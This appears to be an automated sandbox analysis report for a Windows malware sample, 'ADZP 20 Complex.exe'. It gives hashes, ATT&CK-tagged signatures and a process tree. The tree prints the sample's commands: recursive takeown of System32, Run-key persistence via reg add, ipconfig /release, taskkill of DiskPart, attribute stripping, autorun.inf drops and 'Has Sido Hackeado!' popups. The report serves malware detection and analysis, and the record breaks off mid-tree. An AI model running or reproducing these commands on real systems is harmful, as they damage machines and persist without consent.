6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f

Analysis

max time kernel
43s
max time network
124s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
26/04/2024, 22:23 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ADZP 20 Complex.exe
Size

106KB
MD5

8b6a377f9a67d5482a8eba5708f45bb2
SHA1

7197436525e568606850ee5e033c43aea1c3bc91
SHA256

6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f
SHA512

644e51798399168530b05e629b414dd80cac678bd3c8d4a5d164f55736a2b2fd380d3ca4640f7a034c8f043c06b1527b473e2d17da088d5e97de6ea04120dd72
SSDEEP

3072:v7DhdC6kzWypvaQ0FxyNTBfqMXERseQF8:vBlkZvaF4NTBSAesPF8

Score

8^/10

discovery evasion exploit spyware stealer

Malware Config

Signatures

Modifies Windows Firewall 2 TTPs 10 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
24196	Process not Found
3520	Process not Found
17424	Process not Found
24124	Process not Found
24188	Process not Found
19336	Process not Found
22872	Process not Found
22052	Process not Found
18536	Process not Found
15112	Process not Found

Possible privilege escalation attempt 23 IoCs

exploit

pid	Process
6572	takeown.exe
6556	takeown.exe
6616	takeown.exe
7308	icacls.exe
14552	Process not Found
22844	Process not Found
6920	takeown.exe
1592	takeown.exe
1984	takeown.exe
6580	takeown.exe
848	takeown.exe
22908	Process not Found
22880	Process not Found
6904	takeown.exe
6928	takeown.exe
6080	icacls.exe
22856	Process not Found
17436	Process not Found
6608	takeown.exe
2736	takeown.exe
6536	takeown.exe
5832	icacls.exe
5356	icacls.exe

Executes dropped EXE 12 IoCs

pid	Process
2440	ADZP 20 Complex.exe
2692	ADZP 20 Complex.exe
768	ADZP 20 Complex.exe
3596	ADZP 20 Complex.exe
3816	ADZP 20 Complex.exe
3968	ADZP 20 Complex.exe
3992	ADZP 20 Complex.exe
3088	ADZP 20 Complex.exe
2452	ADZP 20 Complex.exe
5036	ADZP 20 Complex.exe
5116	ADZP 20 Complex.exe
320	ADZP 20 Complex.exe

Loads dropped DLL 6 IoCs

pid	Process
1676	cmd.exe
1676	cmd.exe
1676	cmd.exe
1676	cmd.exe
1676	cmd.exe
1676	cmd.exe

Modifies file permissions 1 TTPs 23 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1984	takeown.exe
6536	takeown.exe
6580	takeown.exe
14552	Process not Found
22844	Process not Found
2736	takeown.exe
848	takeown.exe
6572	takeown.exe
6616	takeown.exe
5832	icacls.exe
5356	icacls.exe
6080	icacls.exe
6556	takeown.exe
6608	takeown.exe
7308	icacls.exe
22908	Process not Found
22856	Process not Found
1592	takeown.exe
6904	takeown.exe
6920	takeown.exe
6928	takeown.exe
22880	Process not Found
17436	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops autorun.inf file 1 TTPs 17 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe

Drops file in System32 directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File created	C:\Windows\System32\Twain_20.dll	cmd.exe
File created	C:\Windows\SysWOW64\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
18152	17504	Process not Found	1237

Gathers network information 2 TTPs 59 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
23316	Process not Found
5400	ipconfig.exe
16692	ipconfig.exe
16888	ipconfig.exe
17528	ipconfig.exe
12884	Process not Found
18552	Process not Found
18732	Process not Found
22560	Process not Found
7008	ipconfig.exe
15428	ipconfig.exe
18696	Process not Found
21280	Process not Found
5312	ipconfig.exe
9728	ipconfig.exe
13308	ipconfig.exe
14632	ipconfig.exe
5460	ipconfig.exe
12848	ipconfig.exe
18972	Process not Found
22840	Process not Found
5520	ipconfig.exe
16464	ipconfig.exe
24220	Process not Found
5408	ipconfig.exe
8436	ipconfig.exe
12740	ipconfig.exe
19112	Process not Found
14708	ipconfig.exe
22752	Process not Found
9856	ipconfig.exe
2276	ipconfig.exe
6132	ipconfig.exe
18168	Process not Found
18892	Process not Found
5528	ipconfig.exe
6204	ipconfig.exe
22248	Process not Found
21824	Process not Found
1976	ipconfig.exe
13024	ipconfig.exe
18224	Process not Found
6160	ipconfig.exe
14312	ipconfig.exe
18340	Process not Found
15148	ipconfig.exe
18264	Process not Found
2740	ipconfig.exe
1148	ipconfig.exe
13196	ipconfig.exe
16064	ipconfig.exe
17900	Process not Found
22768	Process not Found
2652	ipconfig.exe
13100	ipconfig.exe
18632	Process not Found
22352	Process not Found
1148	ipconfig.exe
14832	ipconfig.exe

Kills process with taskkill 55 IoCs

evasion

pid	Process
19392	Process not Found
17056	taskkill.exe
16400	taskkill.exe
13392	taskkill.exe
13780	taskkill.exe
5548	taskkill.exe
18596	Process not Found
19388	Process not Found
19104	Process not Found
20368	Process not Found
23344	Process not Found
1536	taskkill.exe
5452	taskkill.exe
16268	Process not Found
6756	Process not Found
18696	Process not Found
7916	Process not Found
6276	taskkill.exe
8436	taskkill.exe
9036	Process not Found
13192	taskkill.exe
13080	Process not Found
5512	taskkill.exe
18080	Process not Found
5596	taskkill.exe
4428	Process not Found
5580	taskkill.exe
15884	taskkill.exe
13896	taskkill.exe
18284	Process not Found
24228	Process not Found
13848	Process not Found
20360	Process not Found
6260	taskkill.exe
16984	taskkill.exe
16632	taskkill.exe
2760	taskkill.exe
1876	taskkill.exe
6236	taskkill.exe
11784	taskkill.exe
16588	taskkill.exe
22592	Process not Found
2964	taskkill.exe
5588	taskkill.exe
15384	taskkill.exe
20152	Process not Found
16820	taskkill.exe
18408	Process not Found
18936	Process not Found
19168	Process not Found
23144	Process not Found
10496	taskkill.exe
16516	taskkill.exe
16060	taskkill.exe
19628	Process not Found

Suspicious behavior: CmdExeWriteProcessMemorySpam 9 IoCs

pid	Process
2440	ADZP 20 Complex.exe
768	ADZP 20 Complex.exe
2692	ADZP 20 Complex.exe
3816	ADZP 20 Complex.exe
3968	ADZP 20 Complex.exe
2452	ADZP 20 Complex.exe
5036	ADZP 20 Complex.exe
5116	ADZP 20 Complex.exe
320	ADZP 20 Complex.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	2736	takeown.exe
Token: SeDebugPrivilege	2760	taskkill.exe
Token: SeDebugPrivilege	1876	taskkill.exe
Token: SeDebugPrivilege	2964	taskkill.exe
Token: SeTakeOwnershipPrivilege	1592	takeown.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeTakeOwnershipPrivilege	1984	takeown.exe
Token: SeTakeOwnershipPrivilege	848	takeown.exe
Token: SeDebugPrivilege	5452	taskkill.exe
Token: SeDebugPrivilege	5512	taskkill.exe
Token: SeDebugPrivilege	5580	taskkill.exe
Token: SeDebugPrivilege	5548	taskkill.exe
Token: SeDebugPrivilege	5588	taskkill.exe
Token: SeDebugPrivilege	5596	taskkill.exe
Token: SeDebugPrivilege	6236	taskkill.exe
Token: SeDebugPrivilege	6260	taskkill.exe
Token: SeDebugPrivilege	6276	taskkill.exe
Token: SeTakeOwnershipPrivilege	6536	takeown.exe
Token: SeTakeOwnershipPrivilege	6556	takeown.exe
Token: SeTakeOwnershipPrivilege	6572	takeown.exe

Suspicious use of SetWindowsHookEx 48 IoCs

pid	Process
2204	mspaint.exe
2032	mspaint.exe
2748	mspaint.exe
2032	mspaint.exe
2204	mspaint.exe
2748	mspaint.exe
2032	mspaint.exe
2204	mspaint.exe
2032	mspaint.exe
2204	mspaint.exe
2748	mspaint.exe
2748	mspaint.exe
3956	mspaint.exe
3144	mspaint.exe
3916	mspaint.exe
3956	mspaint.exe
3972	mspaint.exe
3100	mspaint.exe
2500	mspaint.exe
3144	mspaint.exe
3916	mspaint.exe
3972	mspaint.exe
3100	mspaint.exe
2500	mspaint.exe
5108	mspaint.exe
3856	mspaint.exe
4156	mspaint.exe
3956	mspaint.exe
3956	mspaint.exe
3144	mspaint.exe
3144	mspaint.exe
3916	mspaint.exe
3916	mspaint.exe
5108	mspaint.exe
3856	mspaint.exe
4156	mspaint.exe
3972	mspaint.exe
2500	mspaint.exe
3972	mspaint.exe
3100	mspaint.exe
2500	mspaint.exe
3100	mspaint.exe
5108	mspaint.exe
5108	mspaint.exe
3856	mspaint.exe
3856	mspaint.exe
4156	mspaint.exe
4156	mspaint.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1288 wrote to memory of 2528	1288	ADZP 20 Complex.exe	29
PID 1288 wrote to memory of 2528	1288	ADZP 20 Complex.exe	29
PID 1288 wrote to memory of 2528	1288	ADZP 20 Complex.exe	29
PID 1288 wrote to memory of 2528	1288	ADZP 20 Complex.exe	29
PID 2528 wrote to memory of 2576	2528	cmd.exe	30
PID 2528 wrote to memory of 2576	2528	cmd.exe	30
PID 2528 wrote to memory of 2576	2528	cmd.exe	30
PID 2528 wrote to memory of 2732	2528	cmd.exe	32
PID 2528 wrote to memory of 2732	2528	cmd.exe	32
PID 2528 wrote to memory of 2732	2528	cmd.exe	32
PID 2528 wrote to memory of 2892	2528	cmd.exe	34
PID 2528 wrote to memory of 2892	2528	cmd.exe	34
PID 2528 wrote to memory of 2892	2528	cmd.exe	34
PID 2528 wrote to memory of 2896	2528	cmd.exe	35
PID 2528 wrote to memory of 2896	2528	cmd.exe	35
PID 2528 wrote to memory of 2896	2528	cmd.exe	35
PID 2528 wrote to memory of 1672	2528	cmd.exe	37
PID 2528 wrote to memory of 1672	2528	cmd.exe	37
PID 2528 wrote to memory of 1672	2528	cmd.exe	37
PID 2528 wrote to memory of 2504	2528	cmd.exe	38
PID 2528 wrote to memory of 2504	2528	cmd.exe	38
PID 2528 wrote to memory of 2504	2528	cmd.exe	38
PID 2896 wrote to memory of 2736	2896	cmd.exe	39
PID 2896 wrote to memory of 2736	2896	cmd.exe	39
PID 2896 wrote to memory of 2736	2896	cmd.exe	39
PID 2528 wrote to memory of 2740	2528	cmd.exe	40
PID 2528 wrote to memory of 2740	2528	cmd.exe	40
PID 2528 wrote to memory of 2740	2528	cmd.exe	40
PID 2528 wrote to memory of 2760	2528	cmd.exe	41
PID 2528 wrote to memory of 2760	2528	cmd.exe	41
PID 2528 wrote to memory of 2760	2528	cmd.exe	41
PID 2528 wrote to memory of 2196	2528	cmd.exe	43
PID 2528 wrote to memory of 2196	2528	cmd.exe	43
PID 2528 wrote to memory of 2196	2528	cmd.exe	43
PID 2528 wrote to memory of 764	2528	cmd.exe	44
PID 2528 wrote to memory of 764	2528	cmd.exe	44
PID 2528 wrote to memory of 764	2528	cmd.exe	44
PID 2528 wrote to memory of 1216	2528	cmd.exe	45
PID 2528 wrote to memory of 1216	2528	cmd.exe	45
PID 2528 wrote to memory of 1216	2528	cmd.exe	45
PID 2528 wrote to memory of 1820	2528	cmd.exe	46
PID 2528 wrote to memory of 1820	2528	cmd.exe	46
PID 2528 wrote to memory of 1820	2528	cmd.exe	46
PID 2528 wrote to memory of 1052	2528	cmd.exe	47
PID 2528 wrote to memory of 1052	2528	cmd.exe	47
PID 2528 wrote to memory of 1052	2528	cmd.exe	47
PID 2528 wrote to memory of 1756	2528	cmd.exe	48
PID 2528 wrote to memory of 1756	2528	cmd.exe	48
PID 2528 wrote to memory of 1756	2528	cmd.exe	48
PID 2528 wrote to memory of 952	2528	cmd.exe	49
PID 2528 wrote to memory of 952	2528	cmd.exe	49
PID 2528 wrote to memory of 952	2528	cmd.exe	49
PID 2528 wrote to memory of 2228	2528	cmd.exe	50
PID 2528 wrote to memory of 2228	2528	cmd.exe	50
PID 2528 wrote to memory of 2228	2528	cmd.exe	50
PID 2528 wrote to memory of 2880	2528	cmd.exe	51
PID 2528 wrote to memory of 2880	2528	cmd.exe	51
PID 2528 wrote to memory of 2880	2528	cmd.exe	51
PID 2528 wrote to memory of 2724	2528	cmd.exe	52
PID 2528 wrote to memory of 2724	2528	cmd.exe	52
PID 2528 wrote to memory of 2724	2528	cmd.exe	52
PID 2528 wrote to memory of 2604	2528	cmd.exe	53
PID 2528 wrote to memory of 2604	2528	cmd.exe	53
PID 2528 wrote to memory of 2604	2528	cmd.exe	53

Views/modifies file attributes 1 TTPs 19 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1880	attrib.exe
9308	attrib.exe
1880	attrib.exe
7404	attrib.exe
9360	attrib.exe
9840	attrib.exe
9944	attrib.exe
2196	attrib.exe
5524	attrib.exe
15560	attrib.exe
17308	attrib.exe
20400	Process not Found
824	attrib.exe
5400	attrib.exe
9344	attrib.exe
9884	attrib.exe
7684	attrib.exe
17356	attrib.exe
24064	Process not Found

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe" taskkill /im conhost.exe /f
1⤵
- Suspicious use of WriteProcessMemory
PID:1288
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1056.tmp\1057.tmp\1058.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe" taskkill /im conhost.exe /f"
  2⤵
  - Drops autorun.inf file
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:2528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Twain_20.cmd
    3⤵
    PID:2576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Twain_20.cmd
    3⤵
    PID:2732
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
    3⤵
    PID:2892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2896
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:2736
- - C:\Windows\system32\reg.exe
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
    3⤵
    PID:1672
- - C:\Windows\system32\reg.exe
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
    3⤵
    PID:2504
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:2740
- - C:\Windows\system32\taskkill.exe
    taskkill /im DiskPart /f
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2760
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:2196
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:764
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:1216
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:1820
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:1052
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:1756
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:952
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:2228
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:2880
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:2724
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:2604
- - C:\Windows\system32\msg.exe
    msg * Virus Detectado
    3⤵
    PID:2628
- - C:\Windows\system32\msg.exe
    msg * Virus Detectado
    3⤵
    PID:2608
- - C:\Windows\system32\msg.exe
    msg * Has Sido Hackeado!
    3⤵
    PID:2500
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2440
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\13A0.tmp\13A1.tmp\13A2.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      Loads dropped DLL
      Drops autorun.inf file
      Drops file in System32 directory
      PID:1676
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:1040
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:2024
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:2116
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:2844
      - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:1592
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:2104
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:2312
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:2276
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1876
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:824
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:2356
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:2312
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:2136
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:1528
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:2800
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:3112
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:3444
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:3844
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:3196
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:3548
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        
        PID:3596
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4B52.tmp\4B53.tmp\4B54.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        Drops autorun.inf file
        Drops file in System32 directory
        
        PID:5080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:4488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:4528
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:4636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4652
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:6536
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:4892
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:2392
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5312
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5452
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:9308
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10136
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:5820
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:5480
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:10400
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10948
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:10504
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10920
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:14044
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:16068
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:16936
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:17136
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:16192
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        7⤵
        
        PID:17852
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:3832
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:3868
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3900
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3972
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        
        PID:3992
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4FC5.tmp\4FC6.tmp\4FC7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        Drops autorun.inf file
        Drops file in System32 directory
        
        PID:4492
        
